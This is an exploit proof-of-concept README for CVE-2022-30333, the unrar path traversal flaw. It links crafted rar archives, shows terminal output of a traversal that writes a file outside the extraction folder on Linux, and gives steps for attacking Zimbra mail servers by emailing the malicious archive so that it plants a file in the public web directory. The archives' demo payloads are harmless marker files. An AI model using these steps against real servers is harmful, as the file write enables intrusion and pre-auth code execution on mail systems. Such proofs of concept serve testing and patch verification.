## https://sploitus.com/exploit?id=A573E62D-1BE0-5CD3-8E6D-EB184127464A
# CVE-2022-30333-POC
**Sample file to test CVE-2022-30333**
- [Sample.rar](./sample.rar) : if you want to test on Linux. When you extract, it create **trav** in **../../tmp/traversed**. Please be sure that directory **../../tmp/traversed** exists before extracting Sample.rar
- [exp.rar](./exp.rar) : if you want to test on Zimbra Mail server. When you extract, it create **moo.txt** in */opt/zimbra/jetty\_base/webapps/zimbra/public/*. You can access this file at https://zimbra_mail_domain/public/moo.txt
## EXPLOITATION STEPS
### Testing on Linux
```
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)
ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:34 trav
cat ../../tmp/traversed/trav
"traversed"
```
### Testing on Zimbra
- Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
- The moo.txt should be at: */opt/zimbra/jetty\_base/webapps/zimbra/public/moo.txt* or *https://zimbra_mail_domain/public/moo.txt*
## REFERENCES
1. [Vietnamese blog from DEV2SEC](https://dev2sec.tech/security/zimbra-pre-auth-rce/)
2. [English blog from Sonarsource](https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/)
3. Special thanks to **mrlihd** for helping me rebuild attack-chain in Zimbra